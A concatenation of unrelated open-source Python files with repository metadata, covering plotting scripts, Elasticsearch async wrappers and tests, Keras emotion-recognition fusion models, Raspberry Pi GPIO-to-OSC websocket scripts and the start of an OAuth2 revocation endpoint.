#### File: Thesis/graphs/plot_graph_lp.py
```python
import matplotlib
import matplotlib.pylab as plt
import os
import seaborn as sns
import pandas as pd
import itertools
import numpy as np
def plot_graph(data, baseline, plot_name, figsize, legend):
"""
Plot the input data to latex compatible .pgg format.
"""
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
# sns.set()
sns.set_context("paper")
# sns.set(rc={'figure.figsize':figsize})
palette = 'summer' #['copper_r', 'BuPu'afmhot_r cool_r] https://medium.com/@morganjonesartist/color-guide-to-seaborn-palettes-da849406d44f
sns.set_theme(style="whitegrid")
g = sns.catplot(data=data, kind="bar", x='model', y='score', hue="Metric", ci='sd', palette=palette, legend=legend, legend_out=True, height=figsize[1], aspect=figsize[0]/figsize[1])
g.despine(left=True)
g.set(ylim=(0, .1))
g.map(plt.axhline, y=baseline, color='purple', linestyle='dotted')
# plt.legend(loc='upper right', title='Metric')
plt.xlabel('')
plt.ylabel('Score')
# plt.title(t_name.replace('_', ' ').title())
folder = os.path.dirname(os.path.abspath(__file__)) + '/plots/'
if not os.path.isdir(folder):
os.makedirs(folder)
# plt.savefig(folder + '{}.pgf'.format(plot_name))
plt.savefig(folder + '{}{}.png'.format(plot_name, '' if legend else '_wol'), bbox_inches='tight')
if __name__ == "__main__":
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
col_names = ['hits@1','hits@10','hits@3','mrr']
legend = True
for ds in ['fb', 'wn']:
temp_names =['']
df_list = list()
df_plot = pd.DataFrame()
baseline = 0.006
if ds == 'wn':
legend = False
baseline = 0.0015
plot_name = 'lp_{}'.format(ds)
textwidth_in = 6.69423
figsize = [textwidth_in * 0.8, textwidth_in * .5]
for model in ['GVAE', 'GCVAE']:
df_1 = pd.read_csv('graphs/data/LP/lp_{}_{}.csv'.format(model, ds))
df_temp = df_1[[col for col in df_1.columns if '_temp' in col ]]
df_temp.drop([col for col in df_temp.columns if ('__MIN' in col or '__MAX' in col)], axis=1, inplace=True)
std = df_temp.std(axis=0).to_list()
std = np.array(std[-1:]+std[:-1])
df_1.drop([col for col in df_1.columns if ('__MIN' in col or '__MAX' in col or '_temp' in col)], axis=1, inplace=True)
df_1.drop(['Step'], axis=1, inplace=True)
df_1 = df_1.rename(columns=dict(zip(df_1.columns, col_names)))
scale = .5 if ds == 'fb' else .6
for n in [0, scale,-scale]:
df_plot['score'] = np.array(df_1.stack([0]).to_list()) + n*std
df_plot['model'] = ['RGVAE' if model=='GVAE' else 'cRGVAE'] * len(df_plot)
df_plot['Metric'] = col_names
df_list.append(df_plot.copy())
# df_1.fillna(method='bfill', inplace=True)
# df_list.append(df_1.loc([metric]) for metric in col_names)
df_plot = pd.concat(df_list, axis=0)
df_plot.to_csv('graphs/data/LP/lp_{}.csv'.format(ds))
print('Total {}'.format(len(df_plot)))
# df_plot.mrr = df_plot.mrr * 500
# df2.to_csv('beta_plot.csv')
plot_graph(df_plot, baseline, plot_name, figsize, legend)
```
#### File: Thesis/graphs/plot_permute.py
```python
import matplotlib
import matplotlib.pylab as plt
import os
import seaborn as sns
import pandas as pd
import numpy as np
def plot_graph(data, metric, plot_name, figsize, legend):
"""
Plot the input data to latex compatible .pgg format.
"""
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
# sns.set()
sns.set()
sns.set_context("paper")
sns.set(rc={'figure.figsize':figsize})
# sns.set(rc={'figure.figsize':figsize})
palette = 'summer' #['copper_r', 'BuPu'afmhot_r cool_r] https://medium.com/@morganjonesartist/color-guide-to-seaborn-palettes-da849406d44f
fig, ax = plt.subplots(figsize=figsize)
sns.lineplot(ax=ax, data=data, x='Epoch', y=metric, hue='Model', ci=None, style='$\mathcal{L}$', palette=palette, legend=legend,)
if legend:
plt.legend(loc='upper right', bbox_to_anchor=(1.33, 1), frameon=False, facecolor='white')
plt.xlabel('Epoch')
plt.ylabel('ELBO' if metric=='loss' else 'Permutation rate')
# g = sns.catplot(data=data, kind="line", x='epoch', y=metric, hue='model', style='$\mathcal{L}$', ci='sd', palette=palette, legend=legend, legend_out=True, height=figsize[1], aspect=figsize[0]/figsize[1])
# g.despine(left=True)
# g.set(ylim=(0, .1))
# g.map(plt.axhline, y=baseline, color='purple', linestyle='dotted')
# plt.legend(loc='upper right', title='Metric')
# plt.title(t_name.replace('_', ' ').title())
folder = os.path.dirname(os.path.abspath(__file__)) + '/plots/'
if not os.path.isdir(folder):
os.makedirs(folder)
# plt.savefig(folder + '{}.pgf'.format(plot_name))
plt.savefig(folder + '{}{}.png'.format(plot_name, '' if legend else '_wol'), bbox_inches='tight')
if __name__ == "__main__":
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
df_1 = pd.read_csv('graphs/data/permute_all.csv')
df_1.fillna(method='bfill', inplace=True)
textwidth_in = 6.69423
figsize = [textwidth_in * 0.8, textwidth_in * .5]
df_1.drop([col for col in df_1.columns if ('__MIN' in col or '__MAX' in col or '_temp' in col)], axis=1, inplace=True)
df_1.drop(['Step'], axis=1, inplace=True)
for metric in ['loss', 'permutation']:
plot_name = 'permute_{}'.format(metric)
df_list = list()
df_plot = pd.DataFrame(columns=[metric, 'Epoch', 'Model', '$\mathcal{L}$'])
legend = True if metric=='loss' else False
for model in ['GVAE', 'GCVAE']:
for perm in ['p1','p0']:
df = pd.DataFrame()
cal2keep = [col for col in df_1.columns if (model in col and perm in col)]
m_col = [col for col in cal2keep if metric in col]
df[metric] = df_1[m_col[0]]
df['Model'] = ['RGVAE' if model=='GVAE' else 'cRGVAE'] * len(df)
df['$\mathcal{L}$'] = ['permute' if perm=='p1' else 'standard'] * len(df)
e_col = [col for col in cal2keep if 'epoch' in col]
df['Epoch'] = df_1[e_col[0]]
df_list.append(df.copy())
df_plot = pd.concat(df_list, axis=0)
# df_plot.to_csv('graphs/data/LP/lp_{}.csv'.format(ds))
print('Total {}'.format(len(df_plot)))
# df_plot.mrr = df_plot.mrr * 500
# df2.to_csv('beta_plot.csv')
plot_graph(df_plot, metric, plot_name, figsize, legend)
``` |
{
"source": "3lLobo/WolfDapp",
"score": 2
} |
#### File: tests/unit/test_stupido.py
```python
def test_stpdo():
"""Non-sense test.
"""
assert 1 + 10 == 11
``` |
{
"source": "3lnc/elasticsearch-adsl",
"score": 2
} |
#### File: elasticsearch-adsl/elasticsearch_adsl/connections.py
```python
from elasticsearch_async import AsyncElasticsearch
from elasticsearch_dsl import connections as sync
from elasticsearch_dsl.serializer import serializer
class _Connections(sync.Connections):
def __init__(self):
super().__init__()
self._kwargs = sync.connections._kwargs
self._conns = sync.connections._conns
def create_connection(self, alias='async', client_class=AsyncElasticsearch, **kwargs):
"""
Construct an instance of ``client_class`` and register
it under given alias.
"""
kwargs.setdefault('serializer', serializer)
conn = self._conns[alias] = client_class(**kwargs)
return conn
def get_connection(self, alias='async'):
return super().get_connection(alias)
get_connection.__doc__ = sync.Connections.get_connection.__doc__
_connections = _Connections()
configure = _connections.configure
add_connection = _connections.add_connection
remove_connection = _connections.remove_connection
create_connection = _connections.create_connection
get_connection = _connections.get_connection
```
#### File: elasticsearch-adsl/tests/test_search.py
```python
from elasticsearch_dsl.response import Hit, Response
from pytest import fixture, raises
from elasticsearch_adsl.search import Search
from elasticsearch_dsl.query import MatchAll
@fixture(autouse=True)
async def _test_data(aes, index_name, test_data):
return
async def test_count(index_name):
search = Search(index=index_name)
assert await search.count() == 3
async def test_count_query(index_name):
search = Search(index=index_name).query('range', value={'gt': 1})
assert await search.count() == 2
async def test_count_prefetch(aes, mocker): # FIXME: use high-level interface
mocker.spy(aes, 'count')
search = Search()
await search.execute()
assert await search.count() == 3
assert aes.count.call_count == 0
async def test_execute(index_name):
result = await Search(index=index_name).execute()
assert isinstance(result, Response)
assert len(result.hits) == 3
async def test_execute_query(index_name):
result = await Search(index=index_name).query('term', value=1).execute()
assert result.hits[0] is result[0]
hit = result[0]
assert isinstance(hit, Hit)
assert hit.value == 1
async def test_execute_cache(aes, index_name, mocker):
mocker.spy(aes, 'search')
search = Search(index=index_name)
result1 = await search.execute()
result2 = await search.execute()
assert result1.hits == result2.hits
assert aes.search.call_count == 1
result3 = await search.execute(ignore_cache=True)
assert result3.hits == result1.hits
assert aes.search.call_count == 2
async def test_delete(index_name):
assert await Search(index=index_name).count() == 3
await Search(index=index_name).query('term', value=1).params(refresh=True).delete()
assert await Search(index=index_name).count() == 2
await Search(index=index_name).query(MatchAll()).params(refresh=True).delete()
assert await Search(index=index_name).count() == 0
async def test_scan(index_name):
result = [h async for h in Search(index=index_name).scan()]
assert len(result) == 3
assert isinstance(result[0], Hit)
assert {h.value for h in result} == {1, 2, 3}
async def test_aiter(index_name):
result = [d async for d in Search(index=index_name)[:1]]
assert len(result) == 1
assert isinstance(result[0], Hit)
result = [d async for d in Search(index=index_name)]
assert len(result) == 3
assert isinstance(result[0], Hit)
assert {h.value for h in result} == {1, 2, 3}
def test_iter(index_name):
with raises(TypeError) as e:
iter(Search(index=index_name))
assert 'use asynchronous iteration instead' in str(e.value)
``` |
{
"source": "3lnc/go.py",
"score": 4
} |
#### File: 3lnc/go.py/Vector2D.py
```python
from math import hypot
class Vector2d(object):
def __init__(self, x, y):
self._x = x
self._y = y
def __repr__(self):
return "Vector2d({}, {})".format(self._x, self._y)
def __add__(self, other):
if not isinstance(other, Vector2d):
return NotImplemented
return Vector2d(self._x + other._x, self._y + other._y)
def __eq__(self, other):
if not isinstance(other, Vector2d):
return NotImplemented
return self._x == other._x and self._y == other._y
def __neg__(self):
return Vector2d(-self._x, -self._y)
def __mul__(self, other):
if not isinstance(other, (int, float)):
return NotImplemented
return Vector2d(self._x * other, self._y * other)
def __rmul__(self, other):
return self * other
def __abs__(self):
return hypot(self._x, self._y)
@property
def x(self):
return self._x
@property
def y(self):
return self._y
``` |
{
"source": "3lnc/pytest",
"score": 2
} |
#### File: test_conftest_funcargs_only_available_in_subdir/sub2/conftest.py
```python
import pytest
@pytest.fixture
def arg2(request):
pytest.raises(Exception, "request.getfixturevalue('arg1')")
``` |
{
"source": "3loi/MSP_Face",
"score": 2
} |
#### File: MSP_Face/AudioVisual_Modality/fusion_model_test.py
```python
import numpy as np
from keras.models import Model
from keras.layers import Dense, Input
from keras.optimizers import Adam
from scipy.io import loadmat
from sklearn.metrics import f1_score
from utils import getPaths, cc_coef, evaluation_metrics
from utils import softprob2class_5class, softprob2class_8class
import argparse
def fusion_network_MTL(num_nodes):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
output_act = Dense(units=1, activation='linear')(encode)
output_dom = Dense(units=1, activation='linear')(encode)
output_val = Dense(units=1, activation='linear')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=[output_act, output_dom, output_val])
model.compile(optimizer=adam, loss=[cc_coef, cc_coef, cc_coef])
return model
def fusion_network_class(num_nodes, num_class):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
outputs = Dense(units=num_class, activation='softmax')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=outputs)
model.compile(optimizer=adam, loss='categorical_crossentropy')
return model
###############################################################################
argparse = argparse.ArgumentParser()
argparse.add_argument("-ep", "--epoch", required=True)
argparse.add_argument("-batch", "--batch_size", required=True)
argparse.add_argument("-emo", "--emo_type", required=True)
argparse.add_argument("-nodes", "--num_nodes", required=True)
argparse.add_argument("-nc", "--num_class")
args = vars(argparse.parse_args())
# Parameters
batch_size = int(args['batch_size'])
epochs = int(args['epoch'])
num_nodes = int(args['num_nodes'])
label_type = args['emo_type']
try:
num_class = args['num_class']
except:
pass
# Hidden Features Paths Setting
if label_type == 'attr':
root_dir = './Fusion_Features/3-attribute'
elif label_type == 'class':
if num_class == '5-class':
root_dir = './Fusion_Features/5-class'
elif num_class == '8-class':
root_dir = './Fusion_Features/8-class'
# Loading Paths & Labels
if label_type == 'class':
paths_test, labels_class_test = getPaths(label_type, split_set='Test', num_class=num_class)
elif label_type == 'attr':
# Loading Norm-Label
Label_mean_act = loadmat('./NormTerm/act_norm_means.mat')['normal_para'][0][0]
Label_std_act = loadmat('./NormTerm/act_norm_stds.mat')['normal_para'][0][0]
Label_mean_dom = loadmat('./NormTerm/dom_norm_means.mat')['normal_para'][0][0]
Label_std_dom = loadmat('./NormTerm/dom_norm_stds.mat')['normal_para'][0][0]
Label_mean_val = loadmat('./NormTerm/val_norm_means.mat')['normal_para'][0][0]
Label_std_val = loadmat('./NormTerm/val_norm_stds.mat')['normal_para'][0][0]
paths_test, labels_act_test, labels_dom_test, labels_val_test = getPaths(label_type, split_set='Test', num_class=num_class)
# Loading Hidden Features (Testing set)
X_Test = []
Y_Test_Class = []
Y_Test_Act = []
Y_Test_Dom = []
Y_Test_Val = []
for i in range(len(paths_test)):
try: # deal with missing files
x_audio = loadmat(root_dir + '/Audios/' + paths_test[i].replace('.wav','.mat'))['Feat']
x_video = loadmat(root_dir + '/Videos/' + paths_test[i].replace('.wav','.mat'))['Feat']
# fusing audio-visual hidden features
x = np.concatenate((x_audio, x_video),axis=1)
x = x.reshape(-1)
X_Test.append(x)
if label_type == 'class':
y = labels_class_test[i]
Y_Test_Class.append(y)
elif label_type == 'attr':
y_act = labels_act_test[i]
y_dom = labels_dom_test[i]
y_val = labels_val_test[i]
Y_Test_Act.append(y_act)
Y_Test_Dom.append(y_dom)
Y_Test_Val.append(y_val)
except:
pass
if label_type == 'class':
X_Test = np.array(X_Test)
Y_Test_Class = np.array(Y_Test_Class)
elif label_type == 'attr':
X_Test = np.array(X_Test)
Y_Test_Act = np.array(Y_Test_Act)
Y_Test_Dom = np.array(Y_Test_Dom)
Y_Test_Val = np.array(Y_Test_Val)
# Loading Models
if label_type == 'attr':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+label_type+'.hdf5'
elif label_type == 'class':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+num_class+'.hdf5'
# Testing process
if label_type == 'class':
best_model = fusion_network_class(num_nodes=num_nodes, num_class=int(num_class.split('-')[0]))
best_model.load_weights(filepath)
pred_class_prob = best_model.predict(X_Test)
# class prob => class label
pred_class = []
for i in range(len(pred_class_prob)):
if num_class == '5-class':
pred_class.append(softprob2class_5class(pred_class_prob[i,:]))
elif num_class == '8-class':
pred_class.append(softprob2class_8class(pred_class_prob[i,:]))
pred_class = np.array(pred_class)
# compute evaluation metrics
fs_test_uar = f1_score(Y_Test_Class, pred_class, average='macro')
fs_test_total = f1_score(Y_Test_Class, pred_class, average='micro')
print('Test F1-Score(UAR): '+str(fs_test_uar))
print('Test F1-Score(Total): '+str(fs_test_total))
elif label_type == 'attr':
best_model = fusion_network_MTL(num_nodes=num_nodes)
best_model.load_weights(filepath)
pred_act, pred_dom, pred_val = best_model.predict(X_Test)
# de-normalization
pred_act = (Label_std_act*pred_act)+Label_mean_act
pred_dom = (Label_std_dom*pred_dom)+Label_mean_dom
pred_val = (Label_std_val*pred_val)+Label_mean_val
# Output Predict Reulst
pred_Rsl_Act = str(evaluation_metrics(Y_Test_Act, pred_act)[0])
pred_Rsl_Dom = str(evaluation_metrics(Y_Test_Dom, pred_dom)[0])
pred_Rsl_Val = str(evaluation_metrics(Y_Test_Val, pred_val)[0])
print('Act-CCC: '+str(pred_Rsl_Act))
print('Dom-CCC: '+str(pred_Rsl_Dom))
print('Val-CCC: '+str(pred_Rsl_Val))
```
#### File: MSP_Face/AudioVisual_Modality/fusion_model_train.py
```python
import os
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Model
from keras.layers import Dense, Input
from keras.callbacks import ModelCheckpoint
from keras.optimizers import Adam
from scipy.io import loadmat
from utils import getPaths, cc_coef
from utils import class2onehot_5class, class2onehot_8class
import argparse
def fusion_network_MTL(num_nodes):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
output_act = Dense(units=1, activation='linear')(encode)
output_dom = Dense(units=1, activation='linear')(encode)
output_val = Dense(units=1, activation='linear')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=[output_act, output_dom, output_val])
model.compile(optimizer=adam, loss=[cc_coef, cc_coef, cc_coef])
return model
def fusion_network_class(num_nodes, num_class):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
outputs = Dense(units=num_class, activation='softmax')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=outputs)
model.compile(optimizer=adam, loss='categorical_crossentropy')
return model
###############################################################################
argparse = argparse.ArgumentParser()
argparse.add_argument("-ep", "--epoch", required=True)
argparse.add_argument("-batch", "--batch_size", required=True)
argparse.add_argument("-emo", "--emo_type", required=True)
argparse.add_argument("-nodes", "--num_nodes", required=True)
argparse.add_argument("-nc", "--num_class")
args = vars(argparse.parse_args())
# Parameters
shuffle = True
random_seed = 99
batch_size = int(args['batch_size'])
epochs = int(args['epoch'])
num_nodes = int(args['num_nodes'])
label_type = args['emo_type']
try:
num_class = args['num_class']
except:
pass
# Hidden Features Paths Setting
if label_type == 'attr':
root_dir = './Fusion_Features/3-attribute'
elif label_type == 'class':
if num_class == '5-class':
root_dir = './Fusion_Features/5-class'
elif num_class == '8-class':
root_dir = './Fusion_Features/8-class'
# Loading Paths & Labels
if label_type == 'class':
paths_valid, labels_class_valid = getPaths(label_type, split_set='Validation', num_class=num_class)
paths_train, labels_class_train = getPaths(label_type, split_set='Train', num_class=num_class)
elif label_type == 'attr':
# Loading Norm-Label
Label_mean_act = loadmat('./NormTerm/act_norm_means.mat')['normal_para'][0][0]
Label_std_act = loadmat('./NormTerm/act_norm_stds.mat')['normal_para'][0][0]
Label_mean_dom = loadmat('./NormTerm/dom_norm_means.mat')['normal_para'][0][0]
Label_std_dom = loadmat('./NormTerm/dom_norm_stds.mat')['normal_para'][0][0]
Label_mean_val = loadmat('./NormTerm/val_norm_means.mat')['normal_para'][0][0]
Label_std_val = loadmat('./NormTerm/val_norm_stds.mat')['normal_para'][0][0]
paths_valid, labels_act_valid, labels_dom_valid, labels_val_valid = getPaths(label_type, split_set='Validation', num_class=num_class)
paths_train, labels_act_train, labels_dom_train, labels_val_train = getPaths(label_type, split_set='Train', num_class=num_class)
# shuffle the training set
indexes = np.arange(len(paths_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indexes)
if label_type == 'class':
shuffle_paths_train = [paths_train[k] for k in indexes]
shuffle_class_train = [labels_class_train[k] for k in indexes]
elif label_type == 'attr':
shuffle_paths_train = [paths_train[k] for k in indexes]
shuffle_act_train = [labels_act_train[k] for k in indexes]
shuffle_dom_train = [labels_dom_train[k] for k in indexes]
shuffle_val_train = [labels_val_train[k] for k in indexes]
# Loading Hidden Features (Training set)
X_Train = []
Y_Train_Class = []
Y_Train_Act = []
Y_Train_Dom = []
Y_Train_Val = []
for i in range(len(shuffle_paths_train)):
try: # deal with missing files
x_audio = loadmat(root_dir + '/Audios/' + shuffle_paths_train[i].replace('.wav','.mat'))['Feat']
x_video = loadmat(root_dir + '/Videos/' + shuffle_paths_train[i].replace('.wav','.mat'))['Feat']
# fusing audio-visual hidden features
x = np.concatenate((x_audio, x_video),axis=1)
x = x.reshape(-1)
X_Train.append(x)
if label_type == 'class': # STL
# class to one-hot label
if num_class == '5-class':
y = class2onehot_5class(shuffle_class_train[i])
elif num_class == '8-class':
y = class2onehot_8class(shuffle_class_train[i])
Y_Train_Class.append(y)
elif label_type == 'attr': # MTL
# normalize regression label
y_act = (shuffle_act_train[i]-Label_mean_act)/Label_std_act
y_dom = (shuffle_dom_train[i]-Label_mean_dom)/Label_std_dom
y_val = (shuffle_val_train[i]-Label_mean_val)/Label_std_val
Y_Train_Act.append(y_act)
Y_Train_Dom.append(y_dom)
Y_Train_Val.append(y_val)
except:
pass
if label_type == 'class':
X_Train = np.array(X_Train)
Y_Train_Class = np.array(Y_Train_Class)
elif label_type == 'attr':
X_Train = np.array(X_Train)
Y_Train_Act = np.array(Y_Train_Act)
Y_Train_Dom = np.array(Y_Train_Dom)
Y_Train_Val = np.array(Y_Train_Val)
# Loading Hidden Features (Validation set)
X_Valid = []
Y_Valid_Class = []
Y_Valid_Act = []
Y_Valid_Dom = []
Y_Valid_Val = []
for i in range(len(paths_valid)):
try: # deal with missing files
x_audio = loadmat(root_dir + '/Audios/' + paths_valid[i].replace('.wav','.mat'))['Feat']
x_video = loadmat(root_dir + '/Videos/' + paths_valid[i].replace('.wav','.mat'))['Feat']
# fusing audio-visual hidden features
x = np.concatenate((x_audio, x_video),axis=1)
x = x.reshape(-1)
X_Valid.append(x)
if label_type == 'class':
# class to one-hot label
if num_class == '5-class':
y = class2onehot_5class(labels_class_valid[i])
elif num_class == '8-class':
y = class2onehot_8class(labels_class_valid[i])
Y_Valid_Class.append(y)
elif label_type == 'attr':
y_act = (labels_act_valid[i]-Label_mean_act)/Label_std_act
y_dom = (labels_dom_valid[i]-Label_mean_dom)/Label_std_dom
y_val = (labels_val_valid[i]-Label_mean_val)/Label_std_val
Y_Valid_Act.append(y_act)
Y_Valid_Dom.append(y_dom)
Y_Valid_Val.append(y_val)
except:
pass
if label_type == 'class':
X_Valid = np.array(X_Valid)
Y_Valid_Class = np.array(Y_Valid_Class)
elif label_type == 'attr':
X_Valid = np.array(X_Valid)
Y_Valid_Act = np.array(Y_Valid_Act)
Y_Valid_Dom = np.array(Y_Valid_Dom)
Y_Valid_Val = np.array(Y_Valid_Val)
# loading model structure
if label_type == 'class':
model = fusion_network_class(num_nodes=num_nodes, num_class=int(num_class.split('-')[0]))
elif label_type == 'attr':
model = fusion_network_MTL(num_nodes=num_nodes)
#print(model.summary())
# Output fusion models saving folder
if not os.path.isdir('./Fusion_Models/'):
os.makedirs('./Fusion_Models/')
# setting model checkpoints
if label_type == 'attr':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+label_type+'.hdf5'
elif label_type == 'class':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+num_class+'.hdf5'
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
# model fitting
if label_type == 'class':
model.fit(x=X_Train,
y=Y_Train_Class,
batch_size=batch_size,
epochs=epochs,
validation_data=(X_Valid, Y_Valid_Class),
verbose=1,
callbacks=callbacks_list)
elif label_type == 'attr':
model.fit(x=X_Train,
y=([Y_Train_Act, Y_Train_Dom, Y_Train_Val]),
batch_size=batch_size,
epochs=epochs,
validation_data=(X_Valid, [Y_Valid_Act, Y_Valid_Dom, Y_Valid_Val]),
verbose=1,
callbacks=callbacks_list)
# Show training & validation loss
v_loss = model.history.history['val_loss']
t_loss = model.history.history['loss']
plt.plot(t_loss,'b')
plt.plot(v_loss,'r')
if label_type == 'attr':
plt.savefig('./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+label_type+'.png')
elif label_type == 'class':
plt.savefig('./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+num_class+'.png')
``` |
{
"source": "3lorsin/GPIO-OSC",
"score": 3
} |
#### File: src/html/WS-OSC.py
```python
import asyncio
#import datetime
#import random
import websockets
import argparse
import time
import json
from pythonosc import udp_client
#from configparser import ConfigParser, ExtendedInterpolation
from pymemcache.client.base import Client
GPIOState = Client(('localhost', 11211))
##########
# Config #
##########
with open('/var/www/html/config.json') as config_file:
config = json.load(config_file)
##########
# Config #
##########
#Pause so the GPIO-OSC.py has time to build the memcache
time.sleep(15)
###############
# Send Output #
###############
def send_OSC(json_raw):
data = json.loads(json_raw)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default=data["ip"],
help="The ip of the OSC server")
parser.add_argument("--port", type=int, default=data["port"],
help="The port the OSC server is listening on")
args = parser.parse_args()
client = udp_client.SimpleUDPClient(args.ip, args.port)
client.send_message(data["command"], data["value"])
print('OSC Command Received: '+ json_raw);
def button_pressed(GPIO, state):
button_commands = config['GPIO'][i]["commands"]
# Run each command
for x in button_commands:
if (x != ""):
current_command = config['commands'][x]["command"]
device = config['commands'][x]["device"]
current_value = config['commands'][x][state]
current_ip = config['osc_devices'][device]["ip"]
current_port = config['osc_devices'][device]["port"]
# if command state is null, do not run
if (current_value != "null"):
send_OSC('{ "command":"'+ current_command + '" , "value":'+ current_value+', "ip":"'+current_ip+'", "port":"'+current_port+'" }')
print("Command Executed" + x)
###############
# Send Output #
###############
#############
# WEBSOCKET #
#############
async def hello(websocket, path):
ws_command = await websocket.recv()
await websocket.send("Config Here")
print(ws_command)
print("fired")
#######################################
# message handling #
# type: (button press, configure) #
# data: (JSON DATA) #
#######################################
ws_json = json.loads(ws_command);
if (ws_json['type'] == "sendConfig"):
print('Config')
response = "config sending"
if (ws_json['type'] == 'button_press'):
button_number = ws_json['data'][0]['button']
button_state = ws_json['data'][0]['state']
button_pressed(button_number, button_state)
response = "Command Sent: "+ws_command
#handle configuration edits here
if (ws_json['type'] == 'configure'):
update_config(ws_json['data'][0]['section'], ws_json['data'][0]['option'], ws_json['data'][0]['value'])
print("Configuration Edited")
response = "Config Edited"
await websocket.send(response)
await asyncio.sleep()
print("Starting WS...")
start_websocket_server = websockets.serve(hello, "192.168.1.101", 5678)
#############
# WEBSOCKET #
#############
asyncio.get_event_loop().run_until_complete(start_websocket_server)
asyncio.get_event_loop().run_forever()
```
#### File: GPIO-OSC/will_testing/GPIO-OSC-WS.py
```python
import asyncio
import datetime
import random
import websockets
import argparse
import time
import json
import RPi.GPIO as GPIO
import time
from pythonosc import udp_client
from configparser import ConfigParser, ExtendedInterpolation
##########
# Config #
##########
with open('config.json') as config_file:
config = json.load(config_file)
#print(config['button_1']['commands'])
##########
# Config #
##########
###############
# Send Output #
###############
def send_OSC(json_raw):
data = json.loads(json_raw)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default=data["ip"],
help="The ip of the OSC server")
parser.add_argument("--port", type=int, default=data["port"],
help="The port the OSC server is listening on")
args = parser.parse_args()
client = udp_client.SimpleUDPClient(args.ip, args.port)
client.send_message(data["command"], data["value"])
print('OSC Command Received: '+ json_raw);
def button_pressed(button_number, button_state):
button_commands = config['buttons'][button_number]["commands"]
# Run each command
for x in button_commands:
current_command = config['commands'][x]["command"]
current_value = config['commands'][x][button_state]
current_ip = config['commands'][x]["ip"]
current_port = config['commands'][x]["port"]
# if command state is null, do not run
if (current_value != "null"):
send_OSC('{ "command":"'+ current_command + '" , "value":'+ current_value+', "ip":"'+current_ip+'", "port":"'+current_port+'" }')
print("Command Executed" + x)
###############
# Send Output #
###############
########
# GPIO #
########
GPIO.setmode(GPIO.BOARD)
GPIO.setup(16,GPIO.IN)
GPIO.setup(15,GPIO.IN)
GPIO.setup(18,GPIO.IN)
B1_state = 0
B2_state = 0
B3_state = 0
async def buttons():
try:
while True:
if GPIO.input(16) == 1 and B1_state == 0:
print("Button_1 On")
button_pressed("button_1", "on")
B1_state = 1
time.sleep(.1)
if GPIO.input(16) == 0 and B1_state == 1:
print("Button_1 Off")
button_pressed("button_1", "off")
B1_state = 0
time.sleep(.1)
if GPIO.input(15) == 1 and B2_state == 0:
print("Button_2 On")
button_pressed("button_2", "on")
B2_state = 1
time.sleep(.1)
if GPIO.input(15) == 0 and B2_state == 1:
print("Button_2 Off")
button_pressed("button_2", "off")
B2_state = 0
time.sleep(.1)
if GPIO.input(18) == 1 and B3_state == 0:
print("Button_3 On")
button_pressed("button_3", "on")
B3_state = 1
time.sleep(.1)
if GPIO.input(18) == 0 and B3_state == 1:
print("Button_3 Off")
button_pressed("button_3", "off")
B3_state = 0
time.sleep(.1)
finally:
#cleanup the GPIO pins before ending
GPIO.cleanup()
########
# GPIO #
########
#############
# WEBSOCKET #
#############
async def hello(websocket, path):
ws_command = await websocket.recv()
await websocket.send("Config Here")
print(ws_command)
print("fired")
#######################################
# message handling #
# type: (button press, configure). #
# data: (JSON DATA) #
#######################################
ws_json = json.loads(ws_command);
if (ws_json['type'] == "sendConfig"):
print('Config')
response = "config sending"
if (ws_json['type'] == 'button_press'):
button_number = ws_json['data'][0]['button']
button_state = ws_json['data'][0]['state']
button_pressed(button_number, button_state)
response = "Command Sent: "+ws_command
#handle configuration edits here
if (ws_json['type'] == 'configure'):
update_config(ws_json['data'][0]['section'], ws_json['data'][0]['option'], ws_json['data'][0]['value'])
print("Configuration Edited")
response = "Config Edited"
await websocket.send(response)
await asyncio.sleep()
start_websocket_server = websockets.serve(hello, "192.168.2.2", 5678)
#############
# WEBSOCKET #
#############
asyncio.get_event_loop().run_until_complete(start_websocket_server)
asyncio.get_event_loop().run_forever()
asyncio.run_until_complete(buttons)
``` |
{
"source": "3lpsy/authlib",
"score": 3
} |
#### File: oauth2/rfc7009/revocation.py
```python
from ..rfc6749 import TokenEndpoint
from ..rfc6749 import (
OAuth2Error, InvalidRequestError, UnsupportedTokenTypeError
)
class RevocationEndpoint(TokenEndpoint):
"""Implementation of revocation endpoint which is described in
`RFC7009`_.
